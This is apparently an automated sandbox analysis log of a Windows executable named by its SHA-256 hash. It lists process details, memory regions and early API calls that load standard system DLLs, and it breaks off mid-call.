# Flog Txt Version 1 # Analyzer Version: 4.5.0 # Analyzer Build Date: Apr 22 2022 21:04:16 # Log Creation Date: 05.05.2022 06:21:52.902 Process: id = "1" image_name = "285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe" page_root = "0x6d830000" os_pid = "0x838" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x78c" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 121 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 122 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 123 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 124 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 125 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 126 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 127 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 128 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 129 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 130 start_va = 0x400000 end_va = 0x43bfff monitored = 1 entry_point = 0x4034f7 region_type = mapped_file name = "285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\285e772a15413afa15e86632327faebaa56ff23d0ca19249c228b2d531e19f96.exe") Region: id = 131 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 132 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 133 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 134 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 135 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 136 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 275 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 276 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 277 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 278 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 279 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 280 start_va = 0x520000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 281 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 282 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 283 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 284 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 285 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 286 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 287 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 288 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 289 start_va = 0x520000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 290 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 291 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 292 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 293 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 294 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 295 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 296 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 297 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 298 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 299 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 300 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 301 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 302 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 303 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 304 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 305 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 306 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 307 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 308 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 309 start_va = 0x6cb40000 end_va = 0x6cbd1fff monitored = 0 entry_point = 0x6cb4dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 310 start_va = 0x770000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 311 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 312 start_va = 0x860000 end_va = 0x9e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 313 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 314 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 315 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 316 start_va = 0x9f0000 end_va = 0xb70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 317 start_va = 0xb80000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 318 start_va = 0x770000 end_va = 0x800fff monitored = 0 entry_point = 0x7a8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 319 start_va = 0x850000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 320 start_va = 0x1f80000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 321 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 322 start_va = 0x770000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 323 start_va = 0x705f0000 end_va = 0x70608fff monitored = 0 entry_point = 0x705f47e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 324 start_va = 0x74890000 end_va = 0x74c9afff monitored = 0 entry_point = 0x748badf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 325 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 326 start_va = 0x724f0000 end_va = 0x7263afff monitored = 0 entry_point = 0x72551660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 327 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 328 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 329 start_va = 0x6ca70000 end_va = 0x6cac3fff monitored = 0 entry_point = 0x6ca8dc50 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 330 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 331 start_va = 0x74d20000 end_va = 0x74da3fff monitored = 0 entry_point = 0x74d46220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 332 start_va = 0x705a0000 end_va = 0x705c7fff monitored = 0 entry_point = 0x705a7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 333 start_va = 0x6cb30000 end_va = 0x6cb37fff monitored = 0 entry_point = 0x6cb317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 334 start_va = 0x6cb20000 end_va = 0x6cb25fff monitored = 0 entry_point = 0x6cb21570 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 335 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 336 start_va = 0x2180000 end_va = 0x24b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 337 start_va = 0x500000 end_va = 0x503fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 338 start_va = 0x770000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 339 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 340 start_va = 0x1f80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 341 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 342 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 343 start_va = 0x7b0000 end_va = 0x7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 344 start_va = 0x7c0000 end_va = 0x7c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 345 start_va = 0x7d0000 end_va = 0x7e6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 346 start_va = 0x800000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 347 start_va = 0x810000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 348 start_va = 0x24c0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 349 start_va = 0x25c0000 end_va = 0x2dc9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 350 start_va = 0x6c9e0000 end_va = 0x6ca60fff monitored = 0 entry_point = 0x6c9e6310 region_type = mapped_file name = "riched20.dll" filename = "\\Windows\\SysWOW64\\riched20.dll" (normalized: "c:\\windows\\syswow64\\riched20.dll") Region: id = 351 start_va = 0x6cb00000 end_va = 0x6cb15fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 352 start_va = 0x6c9a0000 end_va = 0x6c9d0fff monitored = 0 entry_point = 0x6c9b22d0 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 353 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 354 start_va = 0x7c0000 end_va = 0x7c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 355 start_va = 0x2080000 end_va = 0x213bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002080000" filename = "" Region: id = 356 start_va = 0x7c0000 end_va = 0x7c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 357 start_va = 0x2140000 end_va = 0x2141fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002140000" filename = "" Region: id = 358 start_va = 0x2150000 end_va = 0x2150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002150000" filename = "" Region: id = 359 start_va = 0x2160000 end_va = 0x2164fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 360 start_va = 0x25c0000 end_va = 0x2dc2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 361 start_va = 0x25c0000 end_va = 0x2dc7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 362 start_va = 0x25c0000 end_va = 0x2dc8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 363 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 1 os_tid = 0xc58 [0107.255] SetErrorMode (uMode=0x8001) returned 0x0 [0107.271] GetVersionExW (in: lpVersionInformation=0x19fe40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fe40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0107.271] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74580000 [0107.271] GetProcAddress (hModule=0x74580000, lpProcName="SetDefaultDllDirectories") returned 0x77556270 [0107.271] SetDefaultDllDirectories (DirectoryFlags=0xc00) returned 1 [0107.272] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.272] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0107.274] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll", hFile=0x0, dwFlags=0x8) returned 0x70610000 [0108.373] lstrlenA (lpString="UXTHEME") returned 7 [0108.373] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.373] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\USERENV.dll") returned 12 [0108.373] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\USERENV.dll", hFile=0x0, dwFlags=0x8) returned 0x705f0000 [0108.837] lstrlenA (lpString="USERENV") returned 7 [0108.837] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.837] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\SETUPAPI.dll") returned 13 [0108.837] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x74890000 [0109.648] lstrlenA (lpString="SETUPAPI") returned 8 [0109.648] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.648] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\APPHELP.dll") returned 12 [0109.648] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\APPHELP.dll", hFile=0x0, dwFlags=0x8) returned 0x744b0000 [0110.221] lstrlenA (lpString="APPHELP") returned 7 [0110.221] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.221] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\PROPSYS.dll") returned 12 [0110.221] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\PROPSYS.dll", hFile=0x0, dwFlags=0x8) returned 0x724f0000 [0110.851] lstrlenA (lpString="PROPSYS") returned 7 [0110.851] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.851] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\DWMAPI.dll") returned 11 [0110.851] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\DWMAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x6fef0000 [0111.156] lstrlenA (lpString="DWMAPI") returned 6 [0111.156] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0111.156] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\CRYPTBASE.dll") returned 14 [0111.156] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\CRYPTBASE.dll", hFile=0x0, dwFlags=0x8) returned 0x74550000 [0111.156] lstrlenA (lpString="CRYPTBASE") returned 9 [0111.156] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0111.157] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\OLEACC.dll") returned 11 [0111.157] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\OLEACC.dll", hFile=0x0, dwFlags=0x8) returned 0x6ca70000 [0111.675] lstrlenA (lpString="OLEACC") returned 6 [0111.675] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0111.675] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\CLBCATQ.dll") returned 12 [0111.676] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\CLBCATQ.dll", hFile=0x0, dwFlags=0x8) returned 0x74d20000 [0112.029] lstrlenA (lpString="CLBCATQ") returned 7 [0112.029] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.029] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\NTMARTA.dll") returned 12 [0112.029] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\NTMARTA.dll", hFile=0x0, dwFlags=0x8) returned 0x705a0000 [0112.391] lstrlenA (lpString="NTMARTA") returned 7 [0112.391] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0112.391] GetSystemDirectoryW (in: lpBuffer=0x19f928, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.391] wsprintfW (in: param_1=0x19f94e, param_2="%s%S.dll" | out: param_1="\\VERSION.dll") returned 12 [0112.391] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\VERSION.dll", hFile=0x0, dwFlags=0x8) returned 0x6cb30000 [0112.607] GetProcAddress (hModule=0x6cb30000, lpProcName="GetFileVersionInfoW") returned 0x6cb31570 [0112.607] GetModuleHandleA 